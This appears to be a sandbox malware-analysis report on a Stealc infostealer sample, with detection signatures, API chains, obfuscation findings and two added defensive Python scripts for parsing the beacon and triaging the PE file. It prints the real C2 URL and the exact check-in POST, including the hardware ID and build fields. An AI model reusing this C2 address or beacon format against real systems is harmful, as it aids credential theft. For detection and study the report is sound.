Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1521035
MD5: e904093ef887cb372b3fe7ab75e6c6c7
SHA1: aece57bd3cbb0bc1818fe026100f30783a6e3f55
SHA256: b99711aa1ee5a0ca9cfcc53dff0ffcab9f2800afad74a0633b1488fe2afa47b7
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Process Tree

  • System is w10x64
  • file.exe (PID: 7324, cmdline: "C:\Users\user\Desktop\file.exe", MD5: E904093EF887CB372B3FE7AB75E6C6C7)
  • cleanup

Malware family: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: no attribution
Blog post URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Extracted malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Yara matches

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000001.00000003.1340711226.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7324 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7324 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
1.2.file.exe.920000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: no rule matched

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-28T03:23:04.686587+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49706 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe; Avira: detected
Source: 1.2.file.exe.920000.0.unpack; Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: http://185.215.113.37/; Virustotal: detection 17%
Source: http://185.215.113.37/e2b1563c6670f193.php_; Virustotal: detection 16%
Source: http://185.215.113.37; Virustotal: detection 17%
Source: http://185.215.113.37/e2b1563c6670f193.php; Virustotal: detection 18%
Source: submitted sample; Integrated Neural Analysis Model: matched with 100.0% probability
Source: file.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_0092C820: lstrlen, CryptStringToBinaryA, lstrcat, lstrcat, lstrcat
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00929AC0: CryptStringToBinaryA, LocalAlloc, CryptStringToBinaryA, LocalFree
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00927240: GetProcessHeap, RtlAllocateHeap, CryptUnprotectData, WideCharToMultiByte, LocalFree
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00929B60: CryptUnprotectData, LocalAlloc, LocalFree
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00938EA0: CryptBinaryToStringA, GetProcessHeap, RtlAllocateHeap, CryptBinaryToStringA
Source: file.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_009338B0: wsprintfA, FindFirstFileA, lstrcat, StrCmpCA, StrCmpCA, wsprintfA, PathMatchSpecA, CoInitialize, CoUninitialize, lstrcat, lstrlen, StrCmpCA, wsprintfA, wsprintfA, PathMatchSpecA, wsprintfA, CopyFileA, __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00934910: wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, wsprintfA, StrCmpCA, wsprintfA, wsprintfA, PathMatchSpecA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_0092DA80: FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_0092E430: FindFirstFileA, StrCmpCA, StrCmpCA, FindNextFileA
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_0092ED20: wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, lstrlen, DeleteFileA, CopyFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00934570: GetProcessHeap, RtlAllocateHeap, wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, wsprintfA, CopyFileA, DeleteFileA, FindNextFileA, FindClose, lstrcat, lstrcat, lstrlen, lstrlen
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_0092F6B0: FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00933EA0: wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_009216D0: FindFirstFileA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_0092DE10: FindFirstFileA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_0092BE70: FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, StrCmpCA, DeleteFileA, StrCmpCA, FindNextFileA, FindClose

                Networking

Source: Network traffic; Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49706 -> 185.215.113.37:80
Source: Malware configuration extractor; URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBK | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 42 31 36 36 33 42 38 30 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 2d 2d 0d 0a
    Data Ascii:
      ------JKEGHDGHCGHDHJKFBFBK
      Content-Disposition: form-data; name="hwid"

      96B1663B80381806970752
      ------JKEGHDGHCGHDHJKFBFBK
      Content-Disposition: form-data; name="build"

      save
      ------JKEGHDGHCGHDHJKFBFBK--
Source: Joe Sandbox View; IP Address: 185.215.113.37
Source: Joe Sandbox View; ASN Name: WHOLESALECONNECTIONSNL
Source: unknown; TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00924880: InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, lstrlen, lstrlen, HttpSendRequestA, InternetReadFile, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle
Source: file.exe, 00000001.00000002.1386340367.000000000109B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000001.00000002.1386340367.0000000001085000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000001.00000002.1386340367.0000000001082000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1386340367.000000000109B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1386340367.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1386340367.0000000001085000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000001.00000002.1386340367.000000000109B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_
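The check-in captured above is small enough to rebuild and parse by hand, which is the quickest way to confirm what the Suricata hit and the extracted configuration are keyed on. The Python below is an added example written for this page, not Joe Sandbox or Stealc code: it reconstructs the POST byte-for-byte from the report's Data Ascii dump (the body comes out at the captured Content-Length of 211), parses the multipart body with a minimal stdlib-only parser, and applies a detection heuristic modelled on what the capture shows: a multipart POST with no User-Agent header whose only fields are hwid and build (the build value is the "Botnet" value in the extracted configuration). The heuristic is the editor's own, not the text of Suricata SID 2044243, and the benign upload used as the negative case is constructed.

```python
"""Parse and classify the Stealc check-in POST captured in the report.
Added example (not Joe Sandbox or Stealc code); stdlib only."""
import re

BOUNDARY = "----JKEGHDGHCGHDHJKFBFBK"   # from the captured Content-Type header

# Rebuilt from the report's Data Ascii dump; the body is 211 bytes, as captured.
RAW_REQUEST = (
    "POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "Host: 185.215.113.37\r\n"
    "Content-Length: 211\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="hwid"\r\n'
    "\r\n"
    "96B1663B80381806970752\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="build"\r\n'
    "\r\n"
    "save\r\n"
    f"--{BOUNDARY}--\r\n"
).encode("latin-1")


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data parser (RFC 2046 framing) returning
    {field name: raw value bytes}; enough for the flat fields Stealc sends."""
    delimiter = b"--" + boundary.encode("latin-1")
    fields = {}
    for part in body.split(delimiter)[1:]:       # [0] is the (empty) preamble
        if part.startswith(b"--"):               # "--boundary--" closes the body
            break
        part = part[2:] if part.startswith(b"\r\n") else part
        part_headers, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', part_headers)
        if m:
            # the CRLF before the next delimiter is framing, not part of the value
            fields[m.group(1).decode("latin-1")] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def classify(raw: bytes) -> dict:
    """Parse one request and say whether it looks like a Stealc check-in.
    Heuristic (editor's, modelled on the capture, not the Suricata rule text):
    POST, multipart/form-data, no User-Agent, exactly the fields hwid + build."""
    method, path, headers, body = parse_http_request(raw)
    content_type = headers.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", content_type)
    fields = {}
    if content_type.startswith("multipart/form-data") and m:
        fields = parse_multipart(body, m.group(1))
    declared = int(headers.get("content-length", "-1"))
    return {
        "method": method,
        "path": path,
        "fields": {k: v.decode("latin-1") for k, v in fields.items()},
        "content_length_ok": declared == len(body),
        "stealc_checkin": (method == "POST"
                           and "user-agent" not in headers
                           and set(fields) == {"hwid", "build"}),
    }


def build_request(path: str, fields: dict, boundary: str, user_agent: str = "") -> bytes:
    """Client-side view of the same framing; used here to construct the
    benign negative case (a browser-style upload that does send a User-Agent)."""
    body = b""
    for name, value in fields.items():
        body += (f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n'
                 f"{value}\r\n").encode("latin-1")
    body += f"--{boundary}--\r\n".encode("latin-1")
    head = (f"POST {path} HTTP/1.1\r\n"
            f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
            f"Host: 185.215.113.37\r\nContent-Length: {len(body)}\r\n")
    if user_agent:
        head += f"User-Agent: {user_agent}\r\n"
    return head.encode("latin-1") + b"\r\n" + body


# Constructed negative case: a normal-looking upload with a User-Agent header.
BENIGN_REQUEST = build_request("/upload.php", {"file": "hello"}, BOUNDARY,
                               user_agent="Mozilla/5.0 (constructed)")

if __name__ == "__main__":
    print(classify(RAW_REQUEST))
    print(classify(BENIGN_REQUEST))
```

The hwid value is what the C2 uses to tell victims apart, and the build tag is the operator's campaign name; a network detection that keys only on the URL path will miss the next build, while one that keys on this bare multipart shape with no User-Agent survives a path change.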

                System Summary

Source: file.exe; Static PE information: section name: (blank)
Source: file.exe; Static PE information: section name: .rsrc
Source: file.exe; Static PE information: section name: .idata
Source: file.exe; Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe; Code functions (by address): 1_2_00BDB057, 1_2_00BB41B9, 1_2_00D0A996, 1_2_00C21141, 1_2_00B95926, 1_2_00CCB2E3, 1_2_00CE0AA8, 1_2_00CEE3E6, 1_2_00CE5B7A, 1_2_00C134EB, 1_2_00CEAD77, 1_2_00CE36EA, 1_2_00CECEE6, 1_2_00CE7687, 1_2_00BF4665, 1_2_00CD57D0, 1_2_00CE977A
Source: C:\Users\user\Desktop\file.exe; Code function: string function 009245C0 appears 316 times
Source: file.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe; Static PE information: section bctajgqz ZLIB complexity 0.9949198632990003
Source: file.exe; Static PE information: entry point disassembly: arithmetic instruction to all instruction ratio 1.0 > 0.5, instruction diversity 0.5
Source: classification engine; Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00938680: CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00933720: CoCreateInstance, MultiByteToWideChar, lstrcpyn
Source: C:\Users\user\Desktop\file.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\3UP3VPLO.htm
Source: C:\Users\user\Desktop\file.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe; String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe; Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe; Static file information: file size 1846784 > 1048576
Source: file.exe; Static PE information: raw size of bctajgqz is bigger than 0x100000 (0x19ca00)
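The static observations above (blank and randomly named sections, a single section of 0x19ca00 bytes with ZLIB complexity 0.99) and the checksum and entry-point findings the Data Obfuscation section lists are all cheap to reproduce without a sandbox. The Python below is an added example written for this page, not Joe Sandbox code: it walks the PE32 headers with the stdlib only, recomputes IMAGE_OPTIONAL_HEADER.CheckSum the way CheckSumMappedFile does, measures per-section Shannon entropy, and reports which section holds the entry point. The analysed sample is not reproduced here, so build_demo_pe32() constructs a small stand-in with a normal .text section and a packed-looking bctajgqz section that owns the entry point; pass a real file path to run the same checks on it (on this sample that is where the 0x1c7339 vs 0x1c56bb mismatch shows up).

```python
"""Static PE32 triage: checksum, section names, entry-point section, entropy.
Added example for this page (not Joe Sandbox code); stdlib only."""
import math
import struct
import sys

# Names a linker normally emits; anything else (bctajgqz, phttshfa, .taggant)
# deserves a look, as does an entry point that is not inside one of these.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".CRT"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """CheckSum as CheckSumMappedFile computes it: 16-bit one's-complement sum
    of the file with the CheckSum field itself skipped, plus the file length.
    A stored value that differs means the header was rewritten after link
    time and never fixed up, which is typical for packed samples."""
    padded = data + (b"\0" if len(data) % 2 else b"")
    total = 0
    for off in range(0, len(padded), 2):
        if checksum_offset <= off < checksum_offset + 4:
            continue
        total += struct.unpack_from("<H", padded, off)[0]
        total = (total & 0xFFFF) + (total >> 16)      # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    return (total & 0xFFFF) + len(data)


def parse_pe32(data: bytes) -> dict:
    """DOS header -> PE signature -> IMAGE_OPTIONAL_HEADER32 -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    n_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (Magic 0x10b) handled here")
    sections = []
    for i in range(n_sections):
        name, vsize, va, raw_size, raw_off = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "raw_off": raw_off, "raw_size": raw_size})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum_off": opt + 64,
            "stored_checksum": struct.unpack_from("<I", data, opt + 64)[0],
            "sections": sections}


def section_for_rva(sections: list, rva: int):
    """Section whose virtual range contains rva, or None."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s
    return None


def triage(data: bytes) -> dict:
    """The static checks the report lists, on one in-memory PE image."""
    pe = parse_pe32(data)
    computed = pe_checksum(data, pe["checksum_off"])
    entry = section_for_rva(pe["sections"], pe["entry_rva"])
    return {
        "stored_checksum": pe["stored_checksum"],
        "computed_checksum": computed,
        "checksum_ok": computed == pe["stored_checksum"],
        "nonstandard_sections": [s["name"] for s in pe["sections"]
                                 if s["name"] not in STANDARD_SECTIONS],
        "entry_section": entry["name"] if entry else None,
        "entry_outside_standard": entry is None or entry["name"] not in STANDARD_SECTIONS,
        "section_entropy": {s["name"]: round(shannon_entropy(
            data[s["raw_off"]:s["raw_off"] + s["raw_size"]]), 3) for s in pe["sections"]},
    }


def with_correct_checksum(data: bytes) -> bytes:
    """Write the recomputed CheckSum back into the header (the fix-up step)."""
    pe = parse_pe32(data)
    fixed = bytearray(data)
    struct.pack_into("<I", fixed, pe["checksum_off"], pe_checksum(data, pe["checksum_off"]))
    return bytes(fixed)


def build_demo_pe32() -> bytes:
    """Constructed stand-in, not the analysed sample: a NOP-filled .text and a
    uniformly distributed 'bctajgqz' holding the entry point, CheckSum left 0."""
    payloads = [(b".text", b"\x90" * 0x200), (b"bctajgqz", bytes(range(256)) * 2)]
    hdr_size = 0x200
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                   # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(payloads), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                  # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2010)                                # entry RVA
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)             # base, alignments
    struct.pack_into("<II", opt, 56, 0x3000, hdr_size)                     # SizeOfImage/Headers
    struct.pack_into("<H", opt, 68, 2)                                     # Subsystem: GUI
    headers = body = b""
    for i, (name, payload) in enumerate(payloads):
        headers += struct.pack("<8sIIIIIIHHI", name, len(payload), 0x1000 * (i + 1),
                               len(payload), hdr_size + len(body), 0, 0, 0, 0, 0x60000020)
        body += payload
    return (dos + coff + bytes(opt) + headers).ljust(hdr_size, b"\0") + body


if __name__ == "__main__":
    sample = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_demo_pe32()
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

None of these checks is proof of malice on its own (signed installers also carry odd section names, and a bad checksum is common in unsigned tooling), but the combination the report flags, an entry point outside every standard section plus a near-incompressible section that makes up most of the file, is the signature of a packed payload waiting to be unpacked at runtime.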

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe; Unpacked PE file 1.2.file.exe.920000.0.unpack, section rights: (blank):EW; .rsrc:W; .idata:W; (blank):EW; bctajgqz:EW; phttshfa:EW; .taggant:EW vs (blank):ER; .rsrc:W; .idata:W; (blank):EW; bctajgqz:EW; phttshfa:EW; .taggant:EW
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00939860: a long run of GetProcAddress calls, five LoadLibraryA calls, then further GetProcAddress calls (API resolution by name)
Source: initial sample; Static PE information: section where entry point is pointing to: .taggant
Source: file.exe; Static PE information: real checksum: 0x1c7339 should be: 0x1c56bb
Source: file.exe; Static PE information: section names: (blank), .rsrc, .idata, (blank), bctajgqz, phttshfa, .taggant
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00DC88CC: push 2178BFE9h; mov dword ptr [esp], edi (at 1_2_00DC8A6C)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00DC88CC: push edi; mov dword ptr [esp], edx (at 1_2_00DC8AED)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00C648D1: push 468A2759h; mov dword ptr [esp], ecx (at 1_2_00C648F2)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00C648D1: push 0CED83D4h; mov dword ptr [esp], ebp (at 1_2_00C64912)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00C648D1: push edx; mov dword ptr [esp], ecx (at 1_2_00C6491C)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00DA50E9: push eax; mov dword ptr [esp], edx (at 1_2_00DA510B)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00DA50E9: push edx; mov dword ptr [esp], ebp (at 1_2_00DA5154)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00D7E88F: push edi; mov dword ptr [esp], ebx (at 1_2_00D7E8EE)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00DB105F: push edx; mov dword ptr [esp], 00000004h (at 1_2_00DB117D)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00D1605E: push edx; mov dword ptr [esp], edi (at 1_2_00D160C6)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00D1D048: push esi; mov dword ptr [esp], 7FE3E912h (at 1_2_00D1D093)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00D1D048: push 1F565B09h; mov dword ptr [esp], eax (at 1_2_00D1D115)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00D1D048: push 5C614DF8h; mov dword ptr [esp], ebx (at 1_2_00D1D124)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00FB605A: push edx; mov dword ptr [esp], 76E366C3h (at 1_2_00FB60D6)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00FB605A: push 3ECF65EBh; mov dword ptr [esp], eax (at 1_2_00FB60F3)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00FB605A: push 6EF77CADh; mov dword ptr [esp], edi (at 1_2_00FB610C)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00FB605A: push esi; mov dword ptr [esp], ecx (at 1_2_00FB616A)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_0093B035: push ecx; ret (at 1_2_0093B048)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00DE380F: push 45569AF4h; mov dword ptr [esp], ecx (at 1_2_00DE38DF)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00DE380F: push ebx; mov dword ptr [esp], 01F0DB0Bh (at 1_2_00DE38EB)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00D58835: push edi; mov dword ptr [esp], ebx (at 1_2_00D5888B)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00D9783A: push 6C65225Ah; mov dword ptr [esp], ebx (at 1_2_00D978AC)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00D9783A: push 0F352231h; mov dword ptr [esp], edi (at 1_2_00D978C9)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00D9783A: push 4D6A1F4Dh; mov dword ptr [esp], ebx (at 1_2_00D9797E)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00BDB057: push 0A6BBC58h; mov dword ptr [esp], esi (at 1_2_00BDB0AE)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00DC8832: push edi; mov dword ptr [esp], esp (at 1_2_00DC8866)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00D0C021: push ebx; mov dword ptr [esp], ecx (at 1_2_00D0C060)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00BB41B9: push 447EB9FCh; mov dword ptr [esp], ebx (at 1_2_00BB41D1)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00BB41B9: push ebp; mov dword ptr [esp], edi (at 1_2_00BB41DD)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00BB41B9: push 334FD091h; mov dword ptr [esp], esi (at 1_2_00BB42AA)
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00C679D3: push eax; mov dword ptr [esp], 7FFE24CEh (at 1_2_00C67A10)
Source: file.exe; Static PE information: section name bctajgqz entropy: 7.953531786807203
